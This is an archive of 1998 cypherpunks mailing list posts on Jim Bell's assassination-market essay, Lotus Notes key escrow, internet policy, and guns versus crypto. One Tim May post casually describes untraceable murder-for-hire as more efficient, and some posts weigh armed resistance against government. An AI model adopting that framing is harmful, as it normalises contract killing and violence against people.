HbygYVmbtqH0Q5aHXO6xVfz6odP0UQB3RblpVZr/Zl99tbbL9mZ5g8CMgcOf57Jq
kORo+q4FTo8DhC7KfOs4oqIcsj+yKsX7qwANMd9RTl+6YXsqcV6A/jf2g3v1Q3wQ
1Oggz1gWNXn3+d2RSuIrCFEoUpLHIfMk4pMv8tH/Ikuaag==
=869+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 7 Jan 1998 04:46:31 +0800
To: Adam Back <declan@well.com
Subject: Re: Jim Bell article excerpt (Was: Letter on Jim Bell)
In-Reply-To: <v03007803b0d8265bac75@[168.161.105.216]>
Message-ID: <v03102802b0d8462b38aa@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:08 AM -0800 1/6/98, Adam Back wrote:

>it looks more like Jim was suggesting that free market forces would
>tend to prevent deaths of lesser known people.  Think about it -- it
>would be dead easy to get a contract on Barney due to the number of
>people who know and hate him -- but on an average neighbor, who is
>completely obscure, you'd easily have to fund the entire bet yourself.

The weakness of Bell's scheme was always that it only worked (so to speak)
with well-known people.

While there are some who want well-known people dead, most murders-for-hire
happen for personal or financial reasons.

Given untraceable payment systems, and buttressed with untraceable escrow
systems, a much more efficient approach is simply to hire the killers
untraceably.

And the fluff about "picking the death date" is a side issue, one which
merely makes the whole thing more cumbersome.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 7 Jan 1998 04:50:48 +0800
To: cypherpunks@Algebra.COM
Subject: Ray Ozzie and the Lotus Notes "40 + 24" GAK Hack
In-Reply-To: <199801061930.NAA09848@wire.insync.net>
Message-ID: <v03102803b0d847b7958d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:30 AM -0800 1/6/98, Eric Cordian wrote:
>Could someone poke through Lotus Notes with a debugger and see exactly how
>this "giving 24 bits to the government" is implemented?
>
>Most commercial software simply introduces redundancy in order to limit
>the keyspace to 40 bits, regardless of the advertised length of the key.
>This claim that they deliver 64 bits of key to the customer seems a bit
>bogus.
>
>Of course, they could have done something clever, like generating a
>completely random 64 bit key, and then encrypting 24 bits of it with a
>giant government-owned RSA public key, and including this additional
>information with each message.  However, it seems unlikely that they would
>employ such strong encryption for message recovery, while offering only 64
>bits for message encryption.
>
>Is Lotus Notes encryption documented anywhere?  Are the differences
>between the export and domestic versions disclosed to overseas customers?

Ray Ozzie, founder of Iris, the company which developed Notes and sold it
to Lotus, discussed his "40 + 24" hack a couple of years ago. It was met
with much derision in the community.

(He sent me a nice letter explaining his motivations for the 40 + 24 hack,
but I was of course unconvinced. BTW, my recollection was that they were
trying to get the industry to adopt this as a way of satisfying _domestic_
calls for GAK, not just for export to those dumb Swedes :-}).

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 7 Jan 1998 05:02:22 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: ACM conference on computer-related policy (DC, 5/98)
In-Reply-To: <Pine.GSO.3.95.980106111057.22930G-100000@well.com>
Message-ID: <v03102804b0d84923eb31@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:11 AM -0800 1/6/98, Declan McCullagh wrote:
>---------- Forwarded message ----------
>Date: Tue, 6 Jan 1998 11:10:49 -0800 (PST)
>From: Declan McCullagh <declan@well.com>
>To: fight-censorship-announce@vorlon.mit.edu
>Subject: ACM conference on computer-related policy (DC, 5/98)
>
>[The best policy for the Net is probably no policy, or at most a hands-off
>one. We don't have national "policies" for how we should regulate, for
>example, newspapers or bookstores, and we don't need such policies for the
>Net. On universal service, we already have Internet connections that are
>cheaper than cable TV; on copyright, the safest course is to let federal
>courts decide; on crypto, most agree that the current "policy" is
>misguided at best. --Declan]
>
>***************
>
>    ASSOCIATION FOR COMPUTING (ACM) ANNUAL CONFERENCE
>
>                * * *  POLICY98  * * *
>         "Shaping Policy in the Information Age"
>
>            Washington, DC, Renaissance Hotel
>                    May 10-12, 1998
..

Jeez, don't these Beltway Bandits _ever_ get tired of holding these
bullshit little conferences?

It seems every month or so there's one of these b.s. things.

Must be a way to justify their existence.

"Shaping Policy in the Information Age." Give me a break.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 7 Jan 1998 05:14:50 +0800
To: cypherpunks@toad.com
Subject: Rep. Sonny Bono (R-California) dies at 62
Message-ID: <Pine.GSO.3.95.980106125637.22930N-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




************

http://cgi.pathfinder.com/netly/afternoon/0,1012,1670,00.html

The Netly News / Afternoon Line
January 6, 1998
When Sonny Turns to Blue

   Rep. Sonny Bono, a Congressman better known for his songwriting than
   his lawmaking, died yesterday in a skiing accident. He was 62. Bono
   built his show-biz career on being the butt of Cher's jokes and found
   that he played a similar role in Washington, a town where
   self-deprecation is reviled, not admired. Washingtonian magazine once
   dubbed him the dumbest member of Congress, and commentators criticized
   his informal approach to lawmaking on the buttoned-down House
   Judiciary committee, on which the California Republican tackled
   Internet legislation. Early last year he staunchly opposed the FBI's
   demands for increased government snooping power but then backed down.
   He told me in September that at first he had not been "aware" of the
   details surrounding the encryption debate and there are others "we
   have to be concerned about." Bono also sponsored H.R. 1621 and H.R.
   2589, two copyright extension bills currently being considered by
   Congress. --Declan McCullagh/Washington







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 7 Jan 1998 02:10:16 +0800
To: cypherpunks@cyberpass.net
Subject: Gadget Warfare, from the Netly News
Message-ID: <v03007801b0d821d99d20@[204.254.22.40]>
MIME-Version: 1.0
Content-Type: text/plain



*********

http://cgi.pathfinder.com/netly/opinion/0,1042,1669,00.html

The Netly News (http://netlynews.com/)
January 6, 1998

Gadget Warfare
by Declan McCullagh (declan@well.com)

       For a country with no real military rivals, the U.S. still
   manages to find an amazing number of enemies. Terrorists top the list
   of anti-American villains, according to a Pentagon report released
   last month.

        The 100-page document, called "Responses to Transnational
   Threats," describes how the military should respond to the threat of
   saboteurs and bombers aiming for violence, not victory. The solution,
   according to the Pentagon, is to develop a set of gadgets that would
   make even James Bond jealous:

         * STICKY ELECTRONICS Think SpiderMan's spidertracers, only smaller.
   "Sticky electronics" adhere to a suspected terrorist's clothing, hair,
   luggage or vehicle and report his location. These almost microscopic
   gizmos tune in to satellite signals and transmit their exact latitude
   and longitude. "To conserve battery (and mission life) they would
   respond only when" activated by a radio signal, the Pentagon says. And
   if you're the suspicious type, sprinkle some in your spouse's
   underwear.

         * DATA MINING If you worried about the FBI's jones for access to
   your data, wait 'til you find out what the military hopes to do. The
   Pentagon wants authority to sift through private-sector databases in
   hopes of tracking down, say, the World Trade Center bombers before
   they strike. The plan is to incorporate "real-time data on
   international border crossings, real-time cargo manifests, global
   financial transactions and the global network carrying international
   airline ticket manifests." As new private-sector databases are
   developed, "the baseline system would be augmented so that the
   correlation and fusion process becomes more automated." But the
   benefits of invading everyone's privacy are dubious: It's hard to
   imagine the alleged Unabomber, for instance, showing up in computer
   files.

[...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Wienke <JonWienk@ix.netcom.com>
Date: Wed, 7 Jan 1998 05:35:36 +0800
To: Wei Dai <cypherpunks@toad.com
Subject: Re: cypherpunks and guns
In-Reply-To: <19980106005136.23824@eskimo.com>
Message-ID: <3.0.3.32.19980106131052.00745004@popd.netcruiser>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 12:51 AM 1/6/98 -0800, Wei Dai wrote:
>I don't understand why there is so much talk about guns here lately.
>Unless someone comes up with a weapon that has some very unusual economic
>properties, individuals cannot hope to compete with governments in the
>domain of deadly force. If we have to resort to physical violence, we've
>already lost!
>
>Think about it: if we can defend ourselves with guns, why would we need
>crypto?

InfoWar has always been a critical component of MeatWar.  Knowing who your
enemy is and where he is at makes it much easier to do something about him.
 Intelligence (in the military sense) and the tools to deny it to your
enemy (strong crypto) are of equal importance to weapons.  If you know that
a homicidal Postal Service employee is standing outside your front door and
is preparing to blast it off its hinges and then kill you, this
intelligence will do nothing but raise your blood pressure if you have no
weapons with which to deal with the situation.  (Calling 911 isn't going to
help you much.)  If you own several "assault weapons", but are asleep in
the living room when the door comes crashing down, the lack of intel will
greatly reduce the effectiveness of said weapons.

I have an equation for this:  Effectiveness = Intelligence * Force * Will. 
I define force as the theoretical ability to inflict damage on an opponent,
whether via bad PR, propaganda, lethal or nonlethal weapons, or any other
means.  Force has 2 components:  Materiel and Skill.  Thus, Force =
Materiel * Skill.  (Example:  If I own a riot shotgun and appropriate
ammunition, and have taken it to the range and familiarized myself with its
use, I have the theoretical ability to shoot the aforementioned Homicidal
Postal Employee, but mere ownership of the weapon and skill in its use does
not guarantee that outcome.)  Will is simply the will to fight if
necessary.

Although government will always have a higher Force factor than an
individual or "the cypherpunks" or a militia, it can be possible to achieve
a higher Effectiveness score via higher Intelligence and/or Will factors. 
This is how we lost the war in Vietnam.  We had a much higher Force level
than the VC, comparable Intelligence levels, but a much lower Will ratio
(at least at the upper decision-making levels).  Because of this, our Force
assets were bound under all sorts of bizarre restrictions which hampered
their usefulness, and we ultimately left in defeat.

By disseminating a mechanism for increasing the Cypherpunks Force level
(the Assassination Politics essay) and annoying some IRS agents with a
stinkbomb, Jim Bell increased the government's Will to capture and
incarcerate him.  This is the problem with with terrorism in general (the
OKC bombing is a prime example).

If either Intelligence (the domain of crypto) or Force (the domain of
weapons) is zero, Effectiveness (the real-world ability to inflict damage
or defend yourself from damage) is also zero.  Ignoring either can be
costly.

-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5

iQA/AwUBNLKd2sJF0kXqpw3MEQJMDACfbGNLIqwE57SxitK5ZDDc/JuWn1YAniO0
MxsO+BZXi+DWL9URMyOj+dzr
=s/B9
-----END PGP SIGNATURE-----


Jonathan Wienke

PGP Key Fingerprints:
7484 2FB7 7588 ACD1  3A8F 778A 7407 2928
3312 6597 8258 9A9E D9FA  4878 C245 D245 EAA7 0DCC

"If ye love wealth greater than liberty, the tranquility of servitude
greater than the animating contest for freedom, go home from us in peace.
We seek not your counsel, nor your arms. Crouch down and lick the hand that
feeds you. May your chains set lightly upon you; and may posterity forget
that ye were our countrymen."
-- Samuel Adams

"Stupidity is the one arena of of human achievement where most people
fulfill their potential."
-- Jonathan Wienke

Never sign a contract that contains the phrase "first-born child."

When the government fears the people there is liberty.
When the people fear the government there is tyranny.

RSA export-o-matic:
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 7 Jan 1998 02:31:45 +0800
To: cypherpunks@cyberpass.net
Subject: Jim Bell article excerpt (Was: Letter on Jim Bell)
Message-ID: <v03007803b0d8265bac75@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



I wrote this last summer:

[...]

Then Assassination Politics sent the IRS into a
tizzy. Jeffrey Gordon, an inspector in the IRS'
Internal Security Division, widened the
investigation immediately. He detailed in an
10-page affidavit how he traced Bell's use of
allegedly fraudulent Social Security Numbers, how
he learned that Bell had been arrested in 1989
for "manufacturing a controlled substance," how
he found out that Bell possessed the home
addresses of a handful of IRS agents. Gordon's
conclusion? Bell planned "to overthrow the
government." The IRS investigator said in his
affidavit that Bell's "essay details an illegal
scheme by Bell which involves plans to
assassinate IRS and other government officials...
I believe that Bell has begun taking steps to
carry out his Assassination Politics plan."

But for all Gordon's bluster in court documents,
he had no proof that Bell broke the law. He
didn't even have enough evidence to arrest the
prolific essayist -- at least not yet.

After the April 1 raid, Gordon and a team of IRS
agents worked to assemble a case against Bell.
They pored through the hard drives of the three
computers they seized. They scrutinized documents
from Bell's house. They interrogated his friends.
They listened to tape recordings of the
"Multnomah County Common Law Court." They scoured
the Net for mentions of Assassination Politics.
Six weeks later they felt their case was
complete.

---

IRS agents arrested Bell on May 16 and charged
him with obstructing government employees and
using false Social Security numbers. Now, this is
hardly attempting "to overthrow the government."
But government agents insist Bell is far more
dangerous than the charges suggest. (The judge
seemed to agree: at the time of this writing,
Bell is being held without bail.)

The latest IRS documents filed with the court
label Bell a terrorist. They claim he talked
about sabotaging the computers in Portland,
Oregon's 911 center, contaminating a local water
supply with a botulism toxin, extracting a poison
called Ricin from castor beans, and manufacturing
Sarin nerve gas. He allegedly bought and tested
some of the chemicals. "Bell has taken overt
steps to implement his overall plan by devising,
obtaining, and testing the materials needed to
carry out attacks against the United States,
including chemicals, nerve agents, destructive
carbon fibers, firearms, and explosives," the
complaint says.

But what really got the IRS in a stink was what
happened a month after they seized Bell's car.
The complaint says: "On March 16, 1997, a Sunday,
an IRS employee noted a strong odor in the
Federal building. On March 17, 1997, several IRS
employees had to be placed on leave due to the
odor, and another employee reported other ill
effects. The odor was traced to a mat and
carpeting... just outside the IRS office
entrance." The chemical proved to be "mercaptan,"
with which Bell's friends say he doused
an adversary's law office in the early 1980s.

Yet if Bell was a crypto-terrorist, he was a
singularly idle one. This is a problem with the
IRS' accusations: if true, they prove too much.
If Bell was bent on toppling the government, and
his exploits date back from the early 1980s, why
are they such laughably juvenile and ineffectual
ones? Stink-bombing offices isn't a Federal
felony, nor should it be.

"I would've thought this would be 'malicious
mischief,' at most," Tim May, one of the founders
of the cypherpunks, writes. "People who've done
far, far, far worse are left unprosecuted in
every major jurisdiction in this country. The
meat thrown to the media -- the usual AP stuff,
mixed in with 'radical libertarian' descriptions
-- is just to make the case more
media-interesting... It sure looks like they're
trying to throw a bunch of charges against the
wall and hope that some of them stick -- or scare
Bell into pleading to a lesser charge."

Since his arrest, the denizens of the cypherpunks
list, where Bell introduced and refined his
ideas, have become generally sympathetic. Gone is
the snarling derision, the attacks on his ideas
as too extreme. Now a sense of solidarity has
emerged. One 'punk wrote: "I have decided that I
cannot in good conscience allow Jim Bell's
persecution for exercising his basic human right
to free speech to pass by without taking personal
action to support him."

---

When I talked to Bell a few days before his
arrest, he spoke calmly and with little rancor
about the pending investigation. I couldn't tell
how he felt after being raided and interrogated
by his arch-enemy, the IRS. But imagine
continuously railing on the Net against
jackbooted thugs, then having real ones bash down
your front door.

Bell was most interested in talking up
Assassination Politics and predicting how it
would eventually blossom. He had just published
an op-ed in a local newspaper saying "the whole
corrupt system" could be stopped. "Whatever my
idea is, it's not silly. There are a lot of
adjectives you can use, but not silly," he told
me. "I feel that the mere fact of having such a
debate will cause people to realize that they no
longer have to tolerate the governments they
previously had to tolerate. At that point I think
politicians will slink away like they did in
eastern Europe in 1989. They'll have lost the
war."

He told me why he became convinced that the
government needed to be lopped off at the knees.
Bell's epiphany came after he ordered a chemical
from a supply firm and was arrested when he
failed to follow EPA regulations. "That
radicalized me," he said. "That pissed me off. I
figured I'd get back at them by taking down their
entire system. That's how I'd do it."'

Moral issues aside, one of the problems plaguing
Bell's scheme is that it's not limited to
eliminating "government thugs who violate your
rights," as he likes to describe it. If it
existed, anyone with some spare change could wipe
out a nosy neighbor or even an irritating grocery
store clerk. After I pointed this out to Bell on
the phone, he fired email back a few days later
saying, "Assuming a functioning Assassination
Politics system, nothing stops you from
contributing to my death." He suggested that
maybe assassins would develop scruples: "You'd
be able to purchase deaths of unworthy people,
but it might be only at a dramatically higher
price. Doable but not particularly economical."

[...]

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Wed, 7 Jan 1998 03:35:58 +0800
To: cypherpunks@cyberpass.net
Subject: Silly Shrinkwrapped Encryption
Message-ID: <199801061930.NAA09848@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Could someone poke through Lotus Notes with a debugger and see exactly how
this "giving 24 bits to the government" is implemented? 

Most commercial software simply introduces redundancy in order to limit
the keyspace to 40 bits, regardless of the advertised length of the key. 
This claim that they deliver 64 bits of key to the customer seems a bit
bogus. 

Of course, they could have done something clever, like generating a
completely random 64 bit key, and then encrypting 24 bits of it with a
giant government-owned RSA public key, and including this additional
information with each message.  However, it seems unlikely that they would
employ such strong encryption for message recovery, while offering only 64
bits for message encryption. 

Is Lotus Notes encryption documented anywhere?  Are the differences
between the export and domestic versions disclosed to overseas customers?

--
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Wed, 7 Jan 1998 03:53:41 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Silly Shrinkwrapped Encryption
In-Reply-To: <199801061930.NAA09848@wire.insync.net>
Message-ID: <199801061949.NAA09879@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



To follow up my prior message...
 
I managed to find a document entitled "Security in Lotus Notes and the
Internet" on the Web.
 
It describes the weakening procedure as follows.
 
  "No matter which version of Notes you are using, encryption uses the
   full 64-bit key size. However, the International edition takes 24 bits
   of the key and encrypts it using an RSA public key for which the US
   National Security Agency holds the matching private key. This
   encrypted portion of the key is then sent with each message as an
   additional field, the workfactor reduction field. The net result of
   this is that an illegitimate hacker has to tackle 64-bit encryption,
   which is at or beyond the practical limit for current decryption
   technology and hardware. The US government, on the other hand, only
   has to break a 40-bit key space, which is much easier (2 to the power
   of 24 times easier, to be precise)."
 
Would anyone care to extract the modulus and exponent for the NSA's
Lotus Notes helper key and post it to this newsgroup?

--
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 7 Jan 1998 06:02:41 +0800
To: cypherpunks@cyberpass.net
Subject: YAIPC (Yet Another Internet Policy Conference, 2/98)
Message-ID: <Pine.GSO.3.95.980106135749.22930X-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain






---------- Forwarded message ----------
Date: Tue, 6 Jan 1998 14:30:57 -0500
From: Ben Isaacson <ben@interactivehq.org>
To: "'declan@well.com'" <declan@well.com>
Subject: Would you consider forwarding this as well?

-->  WashingtonWeb Internet Policy Forum

More info at http://www.washingtonweb.org and
http://www.interactivehq.org

Interactive Industry Leaders and Top Policy Makers to Meet 
at WashingtonWeb Internet Policy Forum

	Washington, DC -- With the mounting interest of 
Washington in the Internet, key policy makers and Internet 
industry executives will come together for a strategic 
discussion about the impact of politics on the Internet.  
Sponsored by the Association for Interactive Media, the 
WashingtonWeb Internet Policy Forum, February 9 and 10, 
1998, is the premier top-level meeting between the 
Washington policy community and the leaders of the new media 
industry.

	"Internet executives and government officials come 
from very different backgrounds.  There needs to be an on-
going dialogue between the users and regulators of this 
powerful medium in order to ensure that businesses may 
continue to grow and serve the public.  The WashingtonWeb 
Internet Policy Forum is designed to facilitate this 
discussion," said Andy Sernovitz, President of the 
Association for Interactive Media.

	Currently, over 300 Members of Congress have co-
sponsored bills regulating interactive businesses.  Federal 
regulatory agencies including the FCC, FTC, NTIA, Treasury, 
Federal Reserve, White House Office of Technology 
Assessment, and the Patent and Trademark Office, are 
considering new legislation and regulation.  Commerce on the 
Net will be forever shaped by the dozens of bills, 
regulations, and policy directives that are already on the 
table.  Participants will have the opportunity to interact 
with the very legislators and regulators who will make these 
decisions.

	A partial list of topics to be discussed at 
WashingtonWeb include:  Pending Legislation and Regulation: 
The Industry Response; Potential Expansion of FTC and FCC 
Jurisdictions; Taxing the Internet; Beltway Wonks vs. Web 
Gurus; Consumer Concerns and Industry Self-Regulation.  
Speakers (to date) include:  Representative Rick Boucher; 
Adam Theirer, Heritage Foundation; Adam Clayton Powell III, 
The Freedom Forum; Pete DuPont, IntellectualCapital.com.; 
Robin Raskin, Editor & Publisher, Family PC Magazine; 
Kenneth Dotson, CBS Sportsline; and Gordon Ross, NetNanny.  
Sponsors include:  Manatt, Phelps & Phillips, Policy.com, 
CNN/Time All Politics, Net Nanny, IntellectualCapital.com, 
and Exodus Communications.

	The WashingtonWeb Internet Policy Forum will be held 
February 9 and 10, 1998, at the Willard intercontinental 
Hotel in Washington, DC.  

CONTACT:	
Andy Dotson
Association for Interactive Media
202-408-0008
andy@interactivehq.org
http://www.washingtonweb.org




___________________________________________________

This message was sent to you because your company
is a member of the Association for Interactive Media.

Visit our web site:  http://www.interactivehq.org

AIM never releases email addresses to third parties.

To SUBSCRIBE or CHANGE YOUR ADDRESS, email a note
to yasha@interactivehq.org

To UNSUBSCRIBE, forward this message to:
unsubscribe-members@lists.interactivehq.org

[staff@interactivehq.org]

___END____________________________________________

List server provided by Lyris -- http://www.lyris.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 7 Jan 1998 06:13:21 +0800
To: cypherpunks@cyberpass.net
Subject: Question on U.S. Postal Service and crypto
Message-ID: <Pine.GSO.3.95.980106134209.22930S-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



This is for a story for Time on the "new" U.S .Postal Service. I vaguely
recall the USPS trying to set digital signature standards and/or serve as
a CA. I'd like to mention this.

Can't remember the details, though. Does anyone have 'em (or a pointer to
them) handy?

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Wed, 7 Jan 1998 03:19:53 +0800
To: cypherpunks@toad.com
Subject: Re: cypherpunks and guns
Message-ID: <199801061912.OAA08946@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Ryan Lackey <rdl@mit.edu>
 
#   AOLserver (a nice web server formerly from GNN/navisoft) punted their
#   128bit SSL module distribution *EVEN TO US CITIZENS* due to commerce
#   department fuckedness.  Anyone know where I could get a copy?  It would
#   really suck to have to patch the 40bit one into a 128bit version, since
#   they do not distribute source.

I don't know if this is the "module" form of the answer you want:

http://www.replay.com/
 
    Download Netscape Communicator 4.04 with 128 bits SSL today on: 
           ftp.replay.com 
    Replay Associates distributes this software
    so you can safely conduct your E-commerce

----

   Tim May wrote:

   >   Final comment: If I find the motivation, I may finish an essay I've been
   >   working on about how we, the Cypherpunks and the World, are *retrogressing*
   >   in crypto areas. Most of the exotic applications are no longer being
   >   discussed, and various mundane commercial products are the main focus.

   >   Yawn.

How about moving this list to encrypt its transmissions in
the recipient's public keys, just to begin encrypting Net traffic?

Obviously not to hide what is being said, but simply to start
moving communications into the encrypted realm.

That way, we'll build up the software tools for handling this,
and try to get other lists to do the same.

Maybe encourage all pro-crypto people to use it for all email to as
many other people they talk with as possible. (Adopt two others...)

Heh: a white-list to allow only encrypted messages through.

Encourage Senators to set up public keys.

In general, try to get the general flow of traffic encrypted,
even if PGP is "mundane" these days.

Solving the human factors problem of getting its use wide-spread
is _not_ a mundane problem. Encryption ain't gonna be that useful
if only a few in-the-know use it.

---guy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Sparkes <isparkes@q9f47.dmst02.telekom.de>
Date: Tue, 6 Jan 1998 23:11:52 +0800
To: cypherpunks@toad.com
Subject: Re: cypherpunks and guns
In-Reply-To: <Wei Dai's message of Tue, 6 Jan 1998 00:51:36 -0800>
Message-ID: <3.0.2.32.19980106144257.006f0fec@q9f47.dmst02.telekom.de>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 05:28 06.01.98 -0500, Ryan Lackey wrote:
><daemon@ATHENA.MIT.EDU> (Wei Dai) writes:
>
>> I don't understand why there is so much talk about guns here 
lately.
>> Unless someone comes up with a weapon that has some very unusual 
economic
>> properties, individuals cannot hope to compete with governments in 
the
>> domain of deadly force. If we have to resort to physical violence, 
we've
>> already lost!
>> 
>> Think about it: if we can defend ourselves with guns, why would we 
need
>> crypto?
>
>I am fairly certain that as an irregular army soldier I could 
inflict
>a substantial amount of damage upon an occupying military.  With 
maybe
>$20k in equipment and several hundred hours of training, you could 
make
>life very difficult for any luckless squad that happens your way.  
Multiply
>that by 100 million armed citizens and you see that armed civilian
>resistance *can* defeat an occupying army.
>

I'm not sure I am convinced by this argument.

The "enemy within" seems to be the main focus of the discussions in 
the CP list. When the 'luckless squad that happens your way' is 
manned by your countrymen at the command of their (and your) 
government, what then?

As far as I can see, the result would be a *very* bloody civil war. 
The outcome may indeed be less obvious than in a 'conventional' (i.e. 
unarmed populace) civil war, but the cost much higher.

This is from the standpoint of a 'sissy' European. I admit I am 
poorly equipped to comment on the American Zeitgeist. However, my 
experience of civil war victims (refugees from the E-bloc) suggests 
that we should be concentrating on social revolution before we tool 
up for military. There is more to be won, with a potentially much 
lower cost.
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNLImc4n3W0ooQnZKEQL4VwCffzMNK1MfQ/1zMv+E/3dfoioc8e8AoL0d
uZMzgq6LPu9nVe90kcA49cbG
=yL/D
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Wed, 7 Jan 1998 07:07:41 +0800
To: Jonathan Wienke <cypherpunks@toad.com
Subject: Re: cypherpunks and guns
In-Reply-To: <19980106005136.23824@eskimo.com>
Message-ID: <3.0.5.32.19980106145505.007b45a0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 01:10 PM 1/6/98 -0800, Jonathan Wienke wrote:

>InfoWar has always been a critical component of MeatWar.  Knowing who your
>enemy is and where he is at makes it much easier to do something about him.

Yep.  Also, infoWar also includes psychops: propoganda and disinformation.
During WWII, the largest
RF transmitter in the world at the time (a GE 500Kwtt) was used to
dishearten troops, incite civilians,
mislead commanders, etc.  Effectively.  Sometimes it jammed known
broadcasts; sometimes
the PSYCHOPS stations identified themselves correctly, more often they
claimed to be something
they weren't.

When everyone can publish c/overtly, it is harder to control the media; the
trade off is that
consumers have to think to filter.  Not a bad deal.

Orwell was an optimist.




------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	Directorate of Intelligence, CIA
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Wed, 7 Jan 1998 08:33:24 +0800
To: cypherpunks@Algebra.COM
Subject: Digital Societies, Guns, and AP
Message-ID: <3.0.32.19980106163317.0068dc1c@cnw.com>
MIME-Version: 1.0
Content-Type: text/enriched

 The conversations on guns, Wei Dai's statement "if we can defend ourselves with guns, why would we need
crypto?", and this idea on Digital Societies, brings up a  consideration:

in the new digital age of anonymity, independent psyops ("psychological operations"; never heard of "psychops"), potential AP arrangements, etc., when governments are made obsolete sometime Real Soon, and people have to depend more and more upon their own resources, how will individuals defend themselves from _immediate_ physical aggression, if not by having their own personal stock pile of weapons and ammo, since they can't call upon the Centralized Gun & Ammo Depot?   

I remember an article in a book by Ayn Rand, on "Competing Governments", where she said that having services provided by more than one such defense service would create many problems, and provided arguments against the feasability of such arrangements.

I know there have been references on the list in the past about some civilization along time ago which existed in Iceland which dealt with this, but I haven't got around to reading about it (can someone provide a book reference?).
..
Blanc



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Sparkes <isparkes@q9f47.dmst02.telekom.de>
Date: Wed, 7 Jan 1998 00:15:58 +0800
To: cypherpunks@ssz.com
Subject: Re: cypherpunks and guns
Message-ID: <3.0.2.32.19980106170810.006f0ff8@q9f47.dmst02.telekom.de>
MIME-Version: 1.0
Content-Type: text/plain



At 05:28 06.01.98 -0500, Ryan Lackey wrote:
><daemon@ATHENA.MIT.EDU> (Wei Dai) writes:
>
>> I don't understand why there is so much talk about guns here lately.
>> Unless someone comes up with a weapon that has some very unusual economic
>> properties, individuals cannot hope to compete with governments in the
>> domain of deadly force. If we have to resort to physical violence, we've
>> already lost!
>> 
>> Think about it: if we can defend ourselves with guns, why would we need
>> crypto?
>
>I am fairly certain that as an irregular army soldier I could inflict
>a substantial amount of damage upon an occupying military. With maybe
>$20k in equipment and several hundred hours of training, you could make
